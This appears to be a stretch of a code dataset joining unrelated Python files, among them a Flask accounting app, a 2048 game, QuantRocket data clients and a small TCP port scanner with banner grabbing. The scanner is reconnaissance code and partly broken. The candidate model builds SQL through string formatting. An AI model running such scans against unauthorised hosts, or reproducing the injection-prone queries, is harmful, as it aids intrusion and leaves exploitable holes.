###########\n objcenter = np.mean(gt_obj_uvd, axis=0)\n com = np.mean(np.array([gt_hand_uvd[0], objcenter]), axis=0)\n else:\n ################ for evaluation set ############\n objCorners = annot['objCorners3D']\n obj_uvd = project_3D_points(camMat, objCorners)\n handroot = np.array(annot['handJoints3D'])\n handroot_uvd = project_3D_points(camMat, handroot.reshape(1, -1))\n handroot_uvd = handroot_uvd[0]\n ################ get the common center point of hand and object ###########\n objcenter = np.mean(obj_uvd, axis=0)\n com = np.mean(np.array([handroot_uvd, objcenter]), axis=0)\n\n #################### v2v approach : voxel segment and generate heatmap ###############\n pointcloud = Main_depthmap2points(depth, ux, uy, fx, fy)\n pointcloud = pointcloud.reshape(-1, 3)\n refpoint = Main_pixelToworld(com.reshape(1, -1), ux, uy, fx, fy)\n refpoint = np.array(refpoint)\n\n ################ below part is old. needed if voxelization is to be checked from respective file ###########\n # joints_world = Main_pixelToworld(handJoints_uvd.copy(), ux, uy, fx, fy)\n # bbox_world = Main_pixelToworld(obj_uvd.copy(), ux, uy, fx, fy)\n #\n # sample = {\n # 'points': pointcloud,\n # 'joints': joints_world,\n # 'bbox': bbox_world,\n # 'refpoint': refpoint,\n # }\n # voxel88, heatmap_joints, heatmap_bbox = transform(sample)\n # testVis(depthvoxel, heatmap_joints, heatmap_bbox)\n # voxel88 = torch.from_numpy(voxel88.reshape((1, 1, *voxel88.shape))).to(device, dtype)\n\n voxel88 = transform.voxelize88(pointcloud, refpoint)\n voxel88 = torch.Tensor(voxel88).unsqueeze(0).to(device, dtype)\n ####################### get prediction ############################\n with torch.no_grad():\n poseResult = posenet(voxel88)\n\n ##################### post processing of outputs ################\n ###################### hand conversion ####################\n hand_hmp = poseResult['handpose'][0].cpu().numpy()\n handUVD, handxyz = pred2Org_handjoints(hand_hmp, refpoint, ux, uy, fx, fy)\n\n\n ################# object conversion #######################\n obj_hmp = poseResult['objpose'][0].cpu().numpy()\n objbboxUVD, objxyz = pred2Org_objbbox(obj_hmp, refpoint, ux, uy, fx, fy)\n\n\n if (validset != 'evaluation'):\n print('hand points loss:', np.mean(np.linalg.norm((handxyz - annot['handJoints3D']), axis=1)))\n print('obj points loss:', np.mean(np.linalg.norm((objxyz - annot['objCorners3D']), axis=1)))\n\n # ###################### compare GT & prediction on visualization #################\n if (args.figMode != ''):\n fileName = saveFolder + '/' + folder + '_' + file + '.png'\n fig = plt.figure(figsize=(30, 30))\n if (validset == 'evaluation'):\n ax1 = fig.add_subplot(1, 1, 1) \n ax1.title.set_text('Prediction')\n if (args.figMode == '2D'):\n plotOnOrgImg(ax1, handUVD, objbboxUVD, depth)\n elif (args.figMode == '3DPC'):\n draw3dpose(ax1, handUVD, objbboxUVD)\n else:\n if (args.figMode == '2D'):\n ax0 = fig.add_subplot(1, 2, 1)\n plotOnOrgImg(ax0,gt_hand_uvd, gt_obj_uvd, depth)\n ax0.title.set_text('Ground Truth')\n\n # show Prediction\n ax1 = fig.add_subplot(1, 2, 2)\n plotOnOrgImg(ax1, handUVD, objbboxUVD, depth)\n ax1.title.set_text('Prediction')\n\n elif (args.figMode == '3DPC'):\n ax0 = fig.add_subplot(1, 2, 1, projection='3d')\n ax0.view_init(elev=0, azim=-50)\n draw3dpose(ax0, gt_hand_uvd, gt_obj_uvd)\n ax0.title.set_text('Ground Truth')\n\n ##### show Prediction\n ax1 = fig.add_subplot(1, 2, 2, projection='3d')\n ax1.view_init(elev=0, azim=-50)\n draw3dpose(ax1, handUVD, objbboxUVD)\n ax1.title.set_text('Prediction')\n\n plt.savefig(fileName)\n plt.close()\n\n\n if (args.saveJSON):\n hand_xyz_list.append(handxyz)\n obj_xyz_list.append(objxyz)\n\n ########## dump results. During testing of qualitative result we don't want to dump ###################\n if(args.saveJSON):\n dump(hand_out_path, hand_xyz_list, [])\n dump(obj_out_path, obj_xyz_list, [])\n","sub_path":"src/final/valid_HO_PNet.py","file_name":"valid_HO_PNet.py","file_ext":"py","file_size_in_byte":7874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"94463940","text":"# -*- coding: utf-8 -*-\n\nimport json\n\nfrom flask import render_template, redirect, request, url_for, flash, session\nfrom flask.ext.login import login_required, login_user, logout_user, current_user\n\nfrom accounting.accounting.service import AccountingService\nfrom accounting.accounting.forms import CostForm\nfrom accounting.users.models import User\nfrom accounting.users.forms import LoginForm\n\n\n@login_required\ndef main():\n months = AccountingService().month_list()\n return render_template(\"mainpage.html\", title='Main', section='', months=months)\n\n\n@login_required\ndef month(year, month_num):\n costs, monthstat, days, cost_by_product = AccountingService().month_data(year, month_num)\n return render_template('month.html',\n title='Month',\n section='cost',\n costs=costs,\n monthstat=monthstat,\n days=days,\n cost_by_product=cost_by_product)\n\n\n@login_required\ndef cost_add():\n add_cost_form = CostForm()\n available_products = [one['name'] for one in AccountingService().products()]\n if request.form:\n add_cost_form = CostForm(request.form)\n if add_cost_form.validate():\n AccountingService().cost_add(add_cost_form.date.data,\n add_cost_form.value.data,\n add_cost_form.products.data,\n add_cost_form.comment.data)\n return redirect(url_for('month', year=add_cost_form.date.data.year,\n month_num=add_cost_form.date.data.month))\n\n return render_template('addcost.html',\n title='Add cost',\n section='add',\n form=add_cost_form,\n available_products=json.dumps(available_products))\n\n@login_required\ndef cost_edit(id):\n edit_cost_form = CostForm(request.form)\n available_products = [one['name'] for one in AccountingService().products()]\n if edit_cost_form.validate():\n AccountingService().cost_edit(id,\n edit_cost_form.date.data,\n edit_cost_form.value.data,\n edit_cost_form.products.data,\n edit_cost_form.comment.data)\n\n return redirect(url_for('month', year=edit_cost_form.date.data.year,\n month_num=edit_cost_form.date.data.month))\n else:\n cost = AccountingService().cost_get(id)\n edit_cost_form = CostForm()\n edit_cost_form.date.data = cost.spend_date\n edit_cost_form.value.data = cost.value\n edit_cost_form.products.data = cost.product.name\n edit_cost_form.comment.data = cost.comment\n return render_template('editcost.html',\n title='Edit cost',\n section='add',\n form=edit_cost_form,\n id=id,\n available_products=json.dumps(available_products))\n\n\n@login_required\ndef cost_remove(id):\n cost = AccountingService().costget(id)\n AccountingService().cost_remove(cost)\n return redirect(url_for('month', year=cost.spend_date.year, month_num=cost.spend_date.month))\n\n\n@login_required\ndef product_one(id):\n product, stats = AccountingService().product_one(id)\n return render_template('product.html',\n title='products',\n section='product',\n product=product,\n stats=stats)\n\n\n@login_required\ndef product_all():\n products = AccountingService().products()\n return render_template('products.html',\n title='products',\n section='product',\n products=products)\n\n\n@login_required\ndef product_remove(id):\n AccountingService().product_remove(id)\n return redirect(url_for('product_all'))\n\n\ndef login():\n if current_user.is_authenticated():\n return redirect(url_for('index'))\n\n form = LoginForm()\n if form.validate_on_submit():\n user = User.select().where(User.username == form.username.data).first()\n if user is not None and user.valid_password(form.password.data):\n if login_user(user, remember=form.remember.data):\n # Enable session expiration only if user hasn't chosen to be\n # remembered.\n session.permanent = not form.remember.data\n flash('Logged in successfully!', 'success')\n return redirect(request.args.get('next') or url_for('index'))\n else:\n flash('This username is disabled!', 'error')\n else:\n flash('Wrong username or password!', 'error')\n return render_template('login.html', form=form)\n\n\n@login_required\ndef logout():\n logout_user()\n flash('You have logged out!')\n return redirect(url_for('index'))\n","sub_path":"src/accounting/frontend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"372733756","text":"V1 = [1, 2, 2, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 5, 6]\n\n\ndef longer_sequence(v1):\n valor = 999999999\n sequence, max_lenght, lenght = 0, 0, len(v1)\n for i in range(lenght):\n if valor != v1[i]:\n valor = v1[i]\n sequence = 1\n else:\n sequence = sequence + 1\n if max_lenght < sequence:\n max_lenght = sequence\n print(max_lenght)\n","sub_path":"Exercicios/venturus.py","file_name":"venturus.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"345073275","text":"from random import randint\nl = [0]*10\nl1 = [' ']*10\ntemp = [0]*10\ntemp2 = []\nnumbers = [2,4]\nprint('************Welcome to 2048 Game************')\nprint(\"----------Press (u or ') for slide up or (d or ;) for slide down or (r or /) for slide right or (l or .) for slide left. For undo press 1----------\")\n\ndef printformat():\n for i in range(1,10):\n if l[i]!=0:\n q = str(l[i])\n for j in range(4-len(q)):\n q+=' '\n l1[i] = q\n else:\n l1[i] = ' '\n print(f'[{l1[1]}|{l1[2]}|{l1[3]}]')\n print(f'[{l1[4]}|{l1[5]}|{l1[6]}]')\n print(f'[{l1[7]}|{l1[8]}|{l1[9]}]\\n')\n\ndef fillnumber():\n while True:\n place = randint(1,9)\n if l[place] == 0:\n l[place] = numbers[randint(0,1)]\n break\n\ndef slideup():\n for i in range(1,7):\n if l[i]==l[i+3]:\n l[i] = l[i]+l[i+3]\n l[i+3] = 0\n for i in range(1,7):\n try:\n if l[i] == l[i+6] and l[i+3]==0:\n l[i] = l[i]+l[i+6]\n l[i+6] = 0\n except:\n pass\n for i in range(1,7):\n try:\n if l[i+3]==l[i+6]:\n l[i+3] = l[i+3]+l[i+6]\n l[i+6] = 0\n except:\n pass\n for i in range(1,10):\n try:\n if l[i]==0:\n l[i] = l[i+3]\n l[i+3] = 0\n except:\n pass\n for i in range(1,10):\n try:\n if l[i]==0:\n l[i] = l[i+3]\n l[i+3] = 0\n except:\n pass\n\ndef slidedown():\n temp[1] = l[7]\n temp[2] = l[8]\n temp[3] = l[9]\n temp[4] = l[4]\n temp[5] = l[5]\n temp[6] = l[6]\n temp[7] = l[1]\n temp[8] = l[2]\n temp[9] = l[3] \n\ndef slideright():\n temp[1] = l[9]\n temp[2] = l[6]\n temp[3] = l[3]\n temp[4] = l[8]\n temp[5] = l[5]\n temp[6] = l[2]\n temp[7] = l[7]\n temp[8] = l[4]\n temp[9] = l[1]\n\ndef slideleft():\n temp[1] = l[1]\n temp[2] = l[4]\n temp[3] = l[7]\n temp[4] = l[2]\n temp[5] = l[5]\n temp[6] = l[8]\n temp[7] = l[3]\n temp[8] = l[6]\n temp[9] = l[9]\n\n\ndef checkwin():\n if 2048 in l:\n printformat()\n print('----------You Win----------')\n exit()\n\nplace = randint(1,9)\nl[place] = numbers[randint(0,1)]\nwhile True:\n if 0 not in l[1:]:\n print('Game Over')\n exit()\n fn = randint(1,50)\n if fn not in (11,25,46,50):\n fillnumber()\n temp2.append(l)\n printformat()\n while True:\n opt = input('Enter slide : ')\n if opt in ('u',\"'\"): \n slideup()\n temp2.append(l)\n break\n elif opt in ('r','/'): \n slideright() \n l = list(temp)\n slideup()\n slideright()\n l = list(temp)\n temp2.append(l)\n break\n elif opt in ('l','.'): \n slideleft()\n l = list(temp)\n slideup()\n slideleft()\n l = list(temp)\n temp2.append(l)\n break\n elif opt in ('d',';'):\n slidedown()\n l = list(temp)\n slideup()\n slidedown()\n l = list(temp)\n temp2.append(l)\n break\n elif opt=='1':\n try:\n l = temp2[-3]\n temp2.remove(l)\n except:\n pass\n printformat()\n else:\n printformat()\n checkwin()","sub_path":"2048Game3X3.py","file_name":"2048Game3X3.py","file_ext":"py","file_size_in_byte":3488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441570016","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/flask_cache/_compat.py\n# Compiled at: 2014-04-21 06:45:19\n\"\"\"\n flask_cache._compat\n ~~~~~~~~~~~~~~~~~~~\n\n Some py2/py3 compatibility support based on a stripped down\n version of six so we don't have to depend on a specific version\n of it.\n\n :copyright: (c) 2013 by Armin Ronacher.\n :license: BSD, see LICENSE for more details.\n\"\"\"\nimport sys\nPY2 = sys.version_info[0] == 2\nPYPY = hasattr(sys, 'pypy_translation_info')\nif not PY2:\n range_type = range\nelse:\n range_type = xrange","sub_path":"pycfiles/Flask_Cache-0.13.1-py2.7/_compat.py","file_name":"_compat.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"78432277","text":"from app.api.v2.database.db import Connection\n\n\nclass Candidate:\n \"\"\" The candidate model \"\"\"\n\n def __init__(self):\n self.db = Connection()\n\n def approve(self, candidate):\n query = \"\"\"UPDATE nominations SET approved=TRUE, dateapproved=NOW() WHERE usr={}\"\"\".format(\n candidate)\n\n self.db.cursor.execute(query)\n return self.db.connection.commit()\n\n def checkApproved(self, candidate):\n if self.db.fetch_approved_candidate(candidate):\n return True\n\n def unApprove(self, candidate):\n if self.checkApproved(candidate):\n query = \"\"\"UPDATE nominations SET approved=FALSE, dateapproved=NOW() WHERE usr={}\"\"\".format(\n candidate)\n\n self.db.cursor.execute(query)\n return self.db.connection.commit()\n\n def getParty(self, candidate):\n data = self.db.fetch_party(candidate)\n party = data[0]\n return party\n\n def getOffice(self, candidate):\n data = self.db.fetch_office(candidate)\n party = data[0]\n return party\n\n def get_all_politicians(self):\n \"\"\"Fetch all politicians\"\"\"\n data = self.db.fetch_all_politicians()\n rows = []\n for i, items in enumerate(data):\n id, user, firstname, lastname, othername, office, party, dateapplied, approved, dateapproved = items\n result = dict(\n id=id,\n usr=user,\n office=office,\n firstname=firstname,\n othername=othername,\n lastname=lastname,\n party=party,\n dateapplied=dateapplied,\n approved=approved,\n dateapproved=dateapproved\n )\n rows.append(result)\n\n return rows\n\n def get_all_candidates(self):\n \"\"\"Get all candidates\"\"\"\n data = self.db.fetch_all_candidates()\n rows = []\n for i, items in enumerate(data):\n id, user, firstname, lastname, othername, office, party, dateapplied, approved, dateapproved = items\n result = dict(\n id=id,\n usr=user,\n office=office,\n firstname=firstname,\n othername=othername,\n lastname=lastname,\n party=party,\n dateapplied=dateapplied,\n approved=approved,\n dateapproved=dateapproved\n )\n rows.append(result)\n\n return rows\n\n def get_candidates_per_office(self, id):\n \"\"\"Get candidates per office\"\"\"\n data = self.db.fetch_candidates_per_office(id)\n rows = []\n for i, items in enumerate(data):\n id, user, firstname, lastname, othername, office, party, dateapplied, approved, dateapproved = items\n result = dict(\n id=id,\n usr=user,\n office=office,\n firstname=firstname,\n othername=othername,\n lastname=lastname,\n party=party,\n dateapplied=dateapplied,\n approved=approved,\n dateapproved=dateapproved\n )\n rows.append(result)\n\n return rows\n\n def party_has_candidate(self, candidate):\n if self.db.fetch_party_approved_candidate(self.getParty(candidate), self.getOffice(candidate)):\n return True\n\n def search(self, candidate):\n \"\"\"This function returns True if a user is already a registered candidate.\"\"\"\n if self.db.fetch_single_item('candidates', candidate):\n return True\n\n def get(self, id):\n data = self.db.fetch_candidate('nominations.usr', id)\n return {\n \"candidate\": data[0]+\" \"+data[1],\n \"office\": data[2],\n \"party\": data[3],\n }\n","sub_path":"app/api/v2/models/candidate.py","file_name":"candidate.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"272544046","text":"import socket\nclass network: \n def __init__(self, host, ports):\n self.host = host\n self.ports = ports\n\n\n def _createSocket(self):\n self.netSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n \n def checkPorts(self):\n netSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print('[+] Checking ',self.host)\n closedPorts = []\n openPorts = []\n for port in self.ports:\n try:\n rtrn = netSocket.connect_ex((self.host, port))\n if(rtrn == 0):\n print('[+] Open Port ', port)\n openPorts.append(port)\n netSocket.close()\n else:\n closedPorts.append(port)\n except Exception as e:\n print('[-] ',e)\n print('[-] Ports closed', str(len(closedPorts)))\n return openPorts\n\n def getBanner(self, openPorts):\n netSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print('[+] Banner Check...')\n for port in openPorts:\n try:\n rtrn = netSocket.connect((self.host, port))\n if(rtrn == 0):\n print('[+] Open Port ', port)\n rec = self.netSocket.recvfrom(1024)\n netSocket.close()\n print(rec)\n else:\n print('[-] Faied to get Banner')\n except Exception as e:\n print('[-] ',e)\n \n\n \n \nfrom nSock import network\n\n# Simple Lib to implement a port scan\n","sub_path":"nSock.py","file_name":"nSock.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"552633983","text":"def calc_result(line):\n changes = 0\n for i, side in enumerate(line):\n try:\n if side != line[i + 1]:\n changes += 1\n except IndexError:\n if side == '-':\n return changes + 1\n else:\n return changes\n\n\nif __name__ == '__main__':\n from sys import stdin\n\n is_header = False\n for case, line in enumerate(stdin.read().split()):\n if not is_header:\n is_header = True\n continue\n print('Case #{}: {}'.format(case, calc_result(line)))\n","sub_path":"codes/CodeJamCrawler/16_0_2/fdellavedova/pancakes.py","file_name":"pancakes.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441159775","text":"\"\"\"\nmax R is 10^6 < 1024 * 1024 = 2 ^ 20\nso only need the prime number dictionary smaller than 20\n\"\"\"\nclass Solution(object):\n def countPrimeSetBits(self, L, R):\n \"\"\"\n :type L: int\n :type R: int\n :rtype: int\n \"\"\"\n count = 0\n primeSet = set([2, 3, 5, 7, 11, 13, 17, 19])\n for i in range(L, R + 1):\n if bin(i).count('1') in primeSet:\n count += 1\n return count\n","sub_path":"solution/python/762.py","file_name":"762.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"446013103","text":"# Copyright 2017 QuantRocket - All Rights Reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\nfrom quantrocket.houston import houston\nfrom quantrocket.cli.utils.output import json_to_cli\nfrom quantrocket.cli.utils.files import write_response_to_filepath_or_buffer\n\ndef fetch_reuters_financials(universes=None, conids=None):\n \"\"\"\n Fetch Reuters financial statements from IB and save to database.\n\n This data provides cash flow, balance sheet, and income metrics.\n\n Parameters\n ----------\n universes : list of str, optional\n limit to these universes (must provide universes, conids, or both)\n\n conids : list of int, optional\n limit to these conids (must provide universes, conids, or both)\n\n Returns\n -------\n dict\n status message\n\n \"\"\"\n params = {}\n if universes:\n params[\"universes\"] = universes\n if conids:\n params[\"conids\"] = conids\n response = houston.post(\"/fundamental/reuters/financials\", params=params)\n\n houston.raise_for_status_with_json(response)\n return response.json()\n\ndef _cli_fetch_reuters_financials(*args, **kwargs):\n return json_to_cli(fetch_reuters_financials, *args, **kwargs)\n\ndef fetch_reuters_estimates(universes=None, conids=None):\n \"\"\"\n Fetch Reuters estimates and actuals from IB and save to database.\n\n This data provides analyst estimates and actuals for a variety of indicators.\n\n Parameters\n ----------\n universes : list of str, optional\n limit to these universes (must provide universes, conids, or both)\n\n conids : list of int, optional\n limit to these conids (must provide universes, conids, or both)\n\n Returns\n -------\n dict\n status message\n\n \"\"\"\n params = {}\n if universes:\n params[\"universes\"] = universes\n if conids:\n params[\"conids\"] = conids\n response = houston.post(\"/fundamental/reuters/estimates\", params=params)\n\n houston.raise_for_status_with_json(response)\n return response.json()\n\ndef _cli_fetch_reuters_estimates(*args, **kwargs):\n return json_to_cli(fetch_reuters_estimates, *args, **kwargs)\n\ndef list_reuters_codes(codes=None, report_types=None, statement_types=None):\n \"\"\"\n List available Chart of Account (COA) codes from the Reuters financials database\n and/or indicator codes from the Reuters estimates/actuals database\n\n Note: you must fetch Reuters financials into the database before you can\n list COA codes.\n\n\n Parameters\n ----------\n codes : list of str, optional\n limit to these Chart of Account (COA) or indicator codes\n\n report_types : list of str, optional\n limit to these report types. Possible choices: financials, estimates\n\n statement_types : list of str, optional\n limit to these statement types. Only applies to financials, not estimates. Possible choices: INC, BAL, CAS\n\n Returns\n -------\n dict\n codes and descriptions\n \"\"\"\n params = {}\n if codes:\n params[\"codes\"] = codes\n if report_types:\n params[\"report_types\"] = report_types\n if statement_types:\n params[\"statement_types\"] = statement_types\n response = houston.get(\"/fundamental/reuters/codes\", params=params)\n\n houston.raise_for_status_with_json(response)\n return response.json()\n\ndef _cli_list_reuters_codes(*args, **kwargs):\n return json_to_cli(list_reuters_codes, *args, **kwargs)\n\ndef download_reuters_financials(codes, filepath_or_buffer=None, output=\"csv\",\n start_date=None, end_date=None,\n universes=None, conids=None,\n exclude_universes=None, exclude_conids=None,\n interim=False, restatements=False, fields=None):\n \"\"\"\n Query financial statements from the Reuters financials database and\n download to file.\n\n You can query one or more COA codes. Use the `list_reuters_codes` function to see\n available codes.\n\n Annual or interim reports are available. Annual is the default and provides\n deeper history.\n\n By default restatements are excluded, but they can optionally be included.\n\n Parameters\n ----------\n codes : list of str, required\n the Chart of Account (COA) code(s) to query\n\n filepath_or_buffer : str or file-like object\n filepath to write the data to, or file-like object (defaults to stdout)\n\n output : str\n output format (json, csv, txt, default is csv)\n\n start_date : str (YYYY-MM-DD), optional\n limit to statements on or after this date (based on the\n fiscal period end date if including restatements, otherwise the\n filing date)\n\n end_date : str (YYYY-MM-DD), optional\n limit to statements on or before this date (based on the\n fiscal period end date if including restatements, otherwise the\n filing date)\n\n universes : list of str, optional\n limit to these universes\n\n conids : list of int, optional\n limit to these conids\n\n exclude_universes : list of str, optional\n exclude these universes\n\n exclude_conids : list of int, optional\n exclude these conids\n\n interim : bool, optional\n return interim reports (default is to return annual reports,\n which provide deeper history)\n\n restatements : bool, optional\n include restatements (default is to exclude them)\n\n fields : list of str, optional\n only return these fields (pass ['?'] or any invalid fieldname to see\n available fields)\n\n Returns\n -------\n None\n\n Examples\n --------\n Query total revenue (COA code RTLR) for a universe of Australian stocks. You can use\n StringIO to load the CSV into pandas.\n\n >>> f = io.StringIO()\n >>> download_reuters_financials([\"RTLR\"], f, universes=[\"asx-stk\"],\n start_date=\"2014-01-01\"\n end_date=\"2017-01-01\")\n >>> financials = pd.read_csv(f, parse_dates=[\"StatementDate\", \"SourceDate\", \"FiscalPeriodEndDate\"])\n\n Query net income (COA code NINC) from interim reports for two securities\n (identified by conid) and include restatements:\n\n >>> download_reuters_financials([\"NINC\"], f, conids=[123456, 234567],\n interim=True, restatements=True)\n\n Query common and preferred shares outstanding (COA codes QTCO and QTPO) and return a\n minimal set of fields (several required fields will always be returned):\n\n >>> download_reuters_financials([\"QTCO\", \"QTPO\"], f, universes=[\"nyse-stk\"],\n fields=[\"Amount\"])\n \"\"\"\n params = {}\n if codes:\n params[\"codes\"] = codes\n if start_date:\n params[\"start_date\"] = start_date\n if end_date:\n params[\"end_date\"] = end_date\n if universes:\n params[\"universes\"] = universes\n if conids:\n params[\"conids\"] = conids\n if exclude_universes:\n params[\"exclude_universes\"] = exclude_universes\n if exclude_conids:\n params[\"exclude_conids\"] = exclude_conids\n if interim:\n params[\"interim\"] = interim\n if restatements:\n params[\"restatements\"] = restatements\n if fields:\n params[\"fields\"] = fields\n\n output = output or \"csv\"\n\n if output not in (\"csv\", \"json\", \"txt\"):\n raise ValueError(\"Invalid ouput: {0}\".format(output))\n\n response = houston.get(\"/fundamental/reuters/financials.{0}\".format(output), params=params,\n timeout=60*5)\n\n houston.raise_for_status_with_json(response)\n\n filepath_or_buffer = filepath_or_buffer or sys.stdout\n\n write_response_to_filepath_or_buffer(filepath_or_buffer, response)\n\ndef _cli_download_reuters_financials(*args, **kwargs):\n return json_to_cli(download_reuters_financials, *args, **kwargs)\n\ndef download_reuters_estimates(codes, filepath_or_buffer=None, output=\"csv\",\n start_date=None, end_date=None,\n universes=None, conids=None,\n exclude_universes=None, exclude_conids=None,\n period_types=None, fields=None):\n \"\"\"\n Query estimates and actuals from the Reuters estimates database and\n download to file.\n\n You can query one or more indicator codes. Use the `list_reuters_codes`\n function to see available codes.\n\n Parameters\n ----------\n codes : list of str, required\n the indicator code(s) to query\n\n filepath_or_buffer : str or file-like object\n filepath to write the data to, or file-like object (defaults to stdout)\n\n output : str\n output format (json, csv, txt, default is csv)\n\n start_date : str (YYYY-MM-DD), optional\n limit to estimates and actuals on or after this fiscal period end date\n\n end_date : str (YYYY-MM-DD), optional\n limit to estimates and actuals on or before this fiscal period end date\n\n universes : list of str, optional\n limit to these universes\n\n conids : list of int, optional\n limit to these conids\n\n exclude_universes : list of str, optional\n exclude these universes\n\n exclude_conids : list of int, optional\n exclude these conids\n\n period_types : list of str, optional\n limit to these fiscal period types. Possible choices: A, Q, S, where\n A=Annual, Q=Quarterly, S=Semi-Annual\n\n fields : list of str, optional\n only return these fields (pass ['?'] or any invalid fieldname to see\n available fields)\n\n Returns\n -------\n None\n\n Examples\n --------\n Query EPS estimates and actuals for a universe of Australian stocks. You can use\n StringIO to load the CSV into pandas.\n\n >>> f = io.StringIO()\n >>> download_reuters_estimates([\"EPS\"], f, universes=[\"asx-stk\"],\n start_date=\"2014-01-01\"\n end_date=\"2017-01-01\")\n >>> estimates = pd.read_csv(f, parse_dates=[\"FiscalPeriodEndDate\", \"AnnounceDate\"])\n \"\"\"\n params = {}\n if codes:\n params[\"codes\"] = codes\n if start_date:\n params[\"start_date\"] = start_date\n if end_date:\n params[\"end_date\"] = end_date\n if universes:\n params[\"universes\"] = universes\n if conids:\n params[\"conids\"] = conids\n if exclude_universes:\n params[\"exclude_universes\"] = exclude_universes\n if exclude_conids:\n params[\"exclude_conids\"] = exclude_conids\n if period_types:\n params[\"period_types\"] = period_types\n if fields:\n params[\"fields\"] = fields\n\n output = output or \"csv\"\n\n if output not in (\"csv\", \"json\", \"txt\"):\n raise ValueError(\"Invalid ouput: {0}\".format(output))\n\n response = houston.get(\"/fundamental/reuters/estimates.{0}\".format(output), params=params,\n timeout=60*5)\n\n houston.raise_for_status_with_json(response)\n\n filepath_or_buffer = filepath_or_buffer or sys.stdout\n\n write_response_to_filepath_or_buffer(filepath_or_buffer, response)\n\ndef _cli_download_reuters_estimates(*args, **kwargs):\n return json_to_cli(download_reuters_estimates, *args, **kwargs)\n","sub_path":"quantrocket/fundamental.py","file_name":"fundamental.py","file_ext":"py","file_size_in_byte":11681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"324777488","text":"from app import db\n\n\nclass TodoList(db.Document):\n name = db.StringField()\n\n def json(self):\n items = [\n item.json()\n for item in TodoItem.query.filter(TodoItem.todo_list.mongo_id == self.mongo_id).all()\n ]\n return {\n \"mongo_id\": str(self.mongo_id),\n \"name\": self.name,\n \"items\": items,\n }\n\n\nclass TodoItem(db.Document):\n text = db.StringField()\n todo_list = db.DocumentField(TodoList)\n due = db.DateTimeField()\n finished = db.BoolField()\n\n def json(self):\n return {\n \"mongo_id\": str(self.mongo_id),\n \"list_mongo_id\": str(self.todo_list.mongo_id),\n \"text\": self.text,\n \"due\": self.due,\n \"finished\": self.finished,\n }\n","sub_path":"app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"497459952","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\bzETL\\parse_bug_history.py\n# Compiled at: 2013-12-18 17:03:15\nimport re, math\nfrom bzETL.util import struct, strings\nfrom bzETL.util.struct import nvl\nfrom bzETL.util.multiset import Multiset\nfrom transform_bugzilla import normalize, NUMERIC_FIELDS, MULTI_FIELDS\nfrom bzETL.util.cnv import CNV\nfrom bzETL.util.logs import Log\nfrom bzETL.util.queries import Q\nfrom bzETL.util.struct import Struct, Null\nfrom bzETL.util.files import File\nfrom bzETL.util.maths import Math\nFLAG_PATTERN = re.compile('^(.*)([?+-])(\\\\([^)]*\\\\))?$')\nDEBUG_CHANGES = False\nDEBUG_STATUS = False\nTRUNC_FIELDS = [\n 'cc', 'blocked', 'dependson', 'keywords']\nKNOWN_MISSING_KEYWORDS = {\n 'dogfood', 'beta1', 'nsbeta1', 'nsbeta2', 'nsbeta3', 'patch', 'mozilla1.0', 'correctness',\n 'mozilla0.9', 'mozilla0.9.9+', 'nscatfood', 'mozilla0.9.3', 'fcc508', 'nsbeta1+', 'mostfreq'}\nSTOP_BUG = 999999999\nMAX_TIME = 9999999999000\n\nclass BugHistoryParser:\n\n def __init__(self, settings, output_queue):\n self.aliases = Null\n self.startNewBug(struct.wrap({'bug_id': 0, 'modified_ts': 0, '_merge_order': 1}))\n self.prevActivityID = Null\n self.prev_row = Null\n self.settings = settings\n self.output = output_queue\n self.initializeAliases()\n\n def processRow(self, row_in):\n if len(row_in.items()) == 0:\n return\n else:\n try:\n try:\n self.currBugID = row_in.bug_id\n if self.settings.debug:\n Log.note('process row: {{row}}', {'row': row_in})\n if self.prevBugID < self.currBugID:\n if self.prevBugID > 0:\n if DEBUG_STATUS:\n Log.note('Emitting intermediate versions for {{bug_id}}', {'bug_id': self.prevBugID})\n self.populateIntermediateVersionObjects()\n if row_in.bug_id == STOP_BUG:\n return\n self.startNewBug(row_in)\n if row_in.field_name in TRUNC_FIELDS:\n added = CNV.value2string(row_in.new_value)\n removed = CNV.value2string(row_in.old_value)\n 